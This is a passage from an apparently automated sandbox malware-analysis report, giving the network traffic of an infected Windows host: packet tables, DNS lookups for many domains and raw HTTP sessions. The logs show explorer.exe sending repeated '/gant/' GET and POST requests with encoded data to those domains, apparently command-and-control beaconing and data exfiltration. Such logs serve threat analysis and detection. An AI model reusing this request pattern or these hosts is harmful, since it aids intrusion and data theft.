                                                                                                                  Feb 13, 2023 19:05:56.552865982 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.552932024 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.553016901 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.553071976 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.553126097 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.553267002 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.553384066 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.553441048 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.553608894 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.652323961 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.652429104 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.652477980 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.652770042 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.652790070 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.652899027 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.652935982 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.653009892 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.653223991 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.653280020 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.653498888 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.653723955 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.752043009 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.752218008 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.752405882 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.752732992 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.752804041 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.865520000 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.962124109 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:57.061245918 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:57.274633884 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:57.374167919 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:57.374459982 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:57.473895073 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:57.961872101 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:57.999003887 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:57.999026060 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:57.999191999 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:57.999327898 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:57.999327898 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:58.061067104 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:58.977744102 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.077785015 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.078211069 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.078337908 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.177939892 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.575496912 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.575611115 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.575694084 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.575779915 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.575779915 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.575865030 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.702617884 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.702861071 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.801971912 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.801989079 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:59.802426100 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.802426100 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.802613974 CET4992980192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:59.901789904 CET8049929142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:12.881151915 CET4993080192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:12.895823002 CET8049930217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:12.896114111 CET4993080192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:12.896269083 CET4993080192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:12.910573959 CET8049930217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:12.920516014 CET8049930217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:12.920555115 CET8049930217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:12.920768023 CET4993080192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:14.411648989 CET4993080192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:24.299942970 CET4993280192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:24.314374924 CET8049932217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:24.314606905 CET4993280192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:24.314667940 CET4993280192.168.11.20217.160.0.64
                                                                                                                  Feb 13, 2023 19:06:24.329230070 CET8049932217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:24.341049910 CET8049932217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:24.341089010 CET8049932217.160.0.64192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:24.341260910 CET4993280192.168.11.20217.160.0.64

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Feb 13, 2023 18:58:08.581355095 CET5890553192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 18:58:08.590842009 CET53589051.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:58:09.092590094 CET5306853192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 18:58:09.138124943 CET53530681.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 18:59:44.861637115 CET6213953192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 18:59:45.009155989 CET53621391.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:00.123164892 CET5343053192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:00:00.141639948 CET53534301.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:17.823031902 CET5212653192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:00:17.834640026 CET53521261.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:25.883100986 CET5166753192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:00:26.609313011 CET53516671.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.457770109 CET5881153192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:00:40.619646072 CET53588111.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:53.767672062 CET6399453192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:00:54.516855001 CET53639941.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:07.921091080 CET6172553192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:01:08.408446074 CET53617251.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:22.059566021 CET5562253192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:01:22.071343899 CET53556221.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:30.135265112 CET5781953192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:01:30.153446913 CET53578191.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:42.835087061 CET5403453192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:01:43.164681911 CET53540341.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:56.331732988 CET6271753192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:01:56.346947908 CET53627171.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:02:09.891653061 CET5510553192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:02:10.470025063 CET53551051.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:02:23.732110023 CET5467053192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:02:24.316884041 CET53546701.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:02:38.261420965 CET5095753192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET53509571.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:02:51.801737070 CET6228053192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:02:52.129297018 CET53622801.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:20.850450993 CET5444753192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:04:21.035495996 CET53544471.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:27.466715097 CET6532553192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:04:28.012552977 CET53653251.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:03.521524906 CET6040153192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:05:03.533258915 CET53604011.1.1.1192.168.11.20
                                                                                                                  Feb 13, 2023 19:06:04.804598093 CET5208353192.168.11.201.1.1.1
                                                                                                                  Feb 13, 2023 19:06:04.819078922 CET53520831.1.1.1192.168.11.20

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Feb 13, 2023 18:58:08.581355095 CET192.168.11.201.1.1.10x8d4eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 18:58:09.092590094 CET192.168.11.201.1.1.10x2b1bStandard query (0)doc-10-2g-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 18:59:44.861637115 CET192.168.11.201.1.1.10x9ddaStandard query (0)www.gargaloid.ruA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:00.123164892 CET192.168.11.201.1.1.10x3f57Standard query (0)www.grenoble-informatique.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:17.823031902 CET192.168.11.201.1.1.10x750cStandard query (0)www.touchdress.siteA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:25.883100986 CET192.168.11.201.1.1.10xa347Standard query (0)www.treebarktees.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:40.457770109 CET192.168.11.201.1.1.10xf933Standard query (0)www.otopodlogi.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:53.767672062 CET192.168.11.201.1.1.10x39ceStandard query (0)www.flyshareinc.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:07.921091080 CET192.168.11.201.1.1.10xcd55Standard query (0)www.lakeviewautomation.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:22.059566021 CET192.168.11.201.1.1.10xe5b9Standard query (0)www.versusfinances.techA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:30.135265112 CET192.168.11.201.1.1.10x16d5Standard query (0)www.performingartshub.co.ukA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:42.835087061 CET192.168.11.201.1.1.10x5198Standard query (0)www.brothersbears.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:56.331732988 CET192.168.11.201.1.1.10x125fStandard query (0)www.sciencevale.xyzA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:09.891653061 CET192.168.11.201.1.1.10xd006Standard query (0)www.hotelyeah.topA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:23.732110023 CET192.168.11.201.1.1.10xc5Standard query (0)www.cc564966.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.261420965 CET192.168.11.201.1.1.10x1324Standard query (0)www.thejointcomission.orgA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:51.801737070 CET192.168.11.201.1.1.10xc038Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:04:20.850450993 CET192.168.11.201.1.1.10xeebeStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:04:27.466715097 CET192.168.11.201.1.1.10x16feStandard query (0)www.dachmotors.comA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:05:03.521524906 CET192.168.11.201.1.1.10x44daStandard query (0)www.touchdress.siteA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:06:04.804598093 CET192.168.11.201.1.1.10x5540Standard query (0)www.versusfinances.techA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Feb 13, 2023 18:58:08.590842009 CET1.1.1.1192.168.11.200x8d4eNo error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 18:58:09.138124943 CET1.1.1.1192.168.11.200x2b1bNo error (0)doc-10-2g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 18:58:09.138124943 CET1.1.1.1192.168.11.200x2b1bNo error (0)googlehosted.l.googleusercontent.com172.217.18.1A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 18:59:45.009155989 CET1.1.1.1192.168.11.200x9ddaNo error (0)www.gargaloid.rugargaloid.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 18:59:45.009155989 CET1.1.1.1192.168.11.200x9ddaNo error (0)gargaloid.ru185.215.4.36A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:00.141639948 CET1.1.1.1192.168.11.200x3f57No error (0)www.grenoble-informatique.com217.160.0.37A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:17.834640026 CET1.1.1.1192.168.11.200x750cName error (3)www.touchdress.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:26.609313011 CET1.1.1.1192.168.11.200xa347No error (0)www.treebarktees.comtreebarktees.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:26.609313011 CET1.1.1.1192.168.11.200xa347No error (0)treebarktees.com103.191.208.50A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:40.619646072 CET1.1.1.1192.168.11.200xf933No error (0)www.otopodlogi.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:40.619646072 CET1.1.1.1192.168.11.200xf933No error (0)www.otopodlogi.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:54.516855001 CET1.1.1.1192.168.11.200x39ceNo error (0)www.flyshareinc.comflyshareinc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:00:54.516855001 CET1.1.1.1192.168.11.200x39ceNo error (0)flyshareinc.com162.241.225.69A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:08.408446074 CET1.1.1.1192.168.11.200xcd55No error (0)www.lakeviewautomation.comlakeviewautomation.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:08.408446074 CET1.1.1.1192.168.11.200xcd55No error (0)lakeviewautomation.com142.44.131.177A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:22.071343899 CET1.1.1.1192.168.11.200xe5b9Name error (3)www.versusfinances.technonenoneA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:30.153446913 CET1.1.1.1192.168.11.200x16d5No error (0)www.performingartshub.co.uk217.160.0.64A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:43.164681911 CET1.1.1.1192.168.11.200x5198No error (0)www.brothersbears.com208.91.197.91A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:56.346947908 CET1.1.1.1192.168.11.200x125fNo error (0)www.sciencevale.xyzsciencevale.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:01:56.346947908 CET1.1.1.1192.168.11.200x125fNo error (0)sciencevale.xyz192.154.231.174A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:10.470025063 CET1.1.1.1192.168.11.200xd006No error (0)www.hotelyeah.tophotelyeah.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:10.470025063 CET1.1.1.1192.168.11.200xd006No error (0)hotelyeah.top75.102.22.168A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:24.316884041 CET1.1.1.1192.168.11.200xc5No error (0)www.cc564966.comp102vty.yb559.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:24.316884041 CET1.1.1.1192.168.11.200xc5No error (0)p102vty.yb559.com147.92.47.182A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:24.316884041 CET1.1.1.1192.168.11.200xc5No error (0)p102vty.yb559.com103.68.173.170A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:38.525166988 CET1.1.1.1192.168.11.200x1324No error (0)www.thejointcomission.org45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:52.129297018 CET1.1.1.1192.168.11.200xc038No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:02:52.129297018 CET1.1.1.1192.168.11.200xc038No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:04:21.035495996 CET1.1.1.1192.168.11.200xeebeNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:04:21.035495996 CET1.1.1.1192.168.11.200xeebeNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:04:28.012552977 CET1.1.1.1192.168.11.200x16feNo error (0)www.dachmotors.comdachmotors.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:04:28.012552977 CET1.1.1.1192.168.11.200x16feNo error (0)dachmotors.com198.251.81.247A (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:05:03.533258915 CET1.1.1.1192.168.11.200x44daName error (3)www.touchdress.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Feb 13, 2023 19:06:04.819078922 CET1.1.1.1192.168.11.200x5540Name error (3)www.versusfinances.technonenoneA (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • drive.google.com
                                                                                                                  • doc-10-2g-docs.googleusercontent.com
                                                                                                                  • www.gargaloid.ru
                                                                                                                  • www.grenoble-informatique.com
                                                                                                                  • www.treebarktees.com
                                                                                                                  • www.otopodlogi.com
                                                                                                                  • www.flyshareinc.com
                                                                                                                  • www.lakeviewautomation.com
                                                                                                                  • www.performingartshub.co.uk
                                                                                                                  • www.brothersbears.com
                                                                                                                  • www.sciencevale.xyz
                                                                                                                  • www.hotelyeah.top
                                                                                                                  • www.cc564966.com
                                                                                                                  • www.thejointcomission.org
                                                                                                                  • www.dachmotors.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.11.2049825142.250.186.46443C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.11.2049826172.217.18.1443C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  10192.168.11.2049851103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:34.698266983 CET627OUTGET /gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:00:35.444925070 CET628INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  x-redirect-by: WordPress
                                                                                                                  location: http://treebarktees.com/gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2
                                                                                                                  x-litespeed-cache: miss


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  11192.168.11.2049852188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:40.630637884 CET629OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.otopodlogi.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.otopodlogi.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 76 38 35 4a 6b 4f 6e 76 41 5a 34 39 41 49 74 33 64 6e 78 54 53 4d 6f 34 39 30 34 48 69 39 77 7e 34 54 72 39 43 53 47 50 54 64 46 41 66 4d 4b 50 59 7a 68 77 32 79 37 63 75 32 44 31 75 58 55 7e 6c 38 51 78 45 70 5f 6f 73 6f 69 33 57 7a 44 53 66 4b 79 37 4d 53 35 63 6a 34 61 4e 43 52 79 49 4a 53 34 32 7a 34 53 51 56 63 63 43 4d 74 77 35 6c 45 36 5a 53 41 4b 61 69 71 56 6f 42 4c 45 4e 70 79 47 67 7a 39 67 6c 6e 55 57 39 34 51 44 39 54 48 52 4b 52 54 76 54 75 34 53 63 44 56 4b 45 33 28 54 58 7a 32 64 52 56 69 43 52 6b 66 5a 48 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7v85JkOnvAZ49AIt3dnxTSMo4904Hi9w~4Tr9CSGPTdFAfMKPYzhw2y7cu2D1uXU~l8QxEp_osoi3WzDSfKy7MS5cj4aNCRyIJS42z4SQVccCMtw5lE6ZSAKaiqVoBLENpyGgz9glnUW94QD9THRKRTvTu4ScDVKE3(TXz2dRViCRkfZHg).
                                                                                                                  Feb 13, 2023 19:00:40.806902885 CET631INData Raw: 9d ee 17 91 76 b8 4e 96 19 2a d7 67 9c 5f ae 50 b9 77 c2 3a 54 68 da ed b5 50 5c af fb bf fe f4 ee 47 e7 f2 9f f1 8f 25 5a d7 6e ff fb e6 c3 fb f2 7f df 3a 23 d4 5c a4 9b ee 97 15 33 80 b3 ad 6c 56 f6 24 b3 ad fc 39 ba 4b 89 fe f3 9f 9b 2b de 21
                                                                                                                  Data Ascii: vN*g_Pw:ThP\G%Zn:#\3lV$9K+!h64E1K]nHaIg7hBH#'h'_d8zy[BquC?8 93FE;]8.{>[YuSGo$H#
                                                                                                                  Feb 13, 2023 19:00:40.806973934 CET631INData Raw: ff 6f 43 47 60 f4 52 79 7a 5b e8 7e 8c 8c 82 db e4 38 23 65 0f 89 3e a1 0d 83 b2 11 fd 7d 8a 29 bd af d7 7b bd ab d6 3e d3 da 8f 70 f5 14 83 7d 4e 7c 3c 86 e5 b3 ed c9 e0 db 05 53 f7 c5 89 f3 98 dd e8 a5 d9 0a 7a d5 dc be 4e 53 47 b0 b6 a5 7d 25
                                                                                                                  Data Ascii: oCG`Ryz[~8#e>}){>p}N|<SzNSG}%$|Y&_kO?V4%necPldPR0oMT8%y5G1PZD%'>zJTsfUCVvC}*raU8'Ikr\!hwH
                                                                                                                  Feb 13, 2023 19:00:40.807017088 CET631INData Raw: 61 0d 0a 03 00 57 6f fe 89 c0 17 00 00 0d 0a
                                                                                                                  Data Ascii: aWo
                                                                                                                  Feb 13, 2023 19:00:40.807055950 CET631INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0
                                                                                                                  Feb 13, 2023 19:00:40.816124916 CET633INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
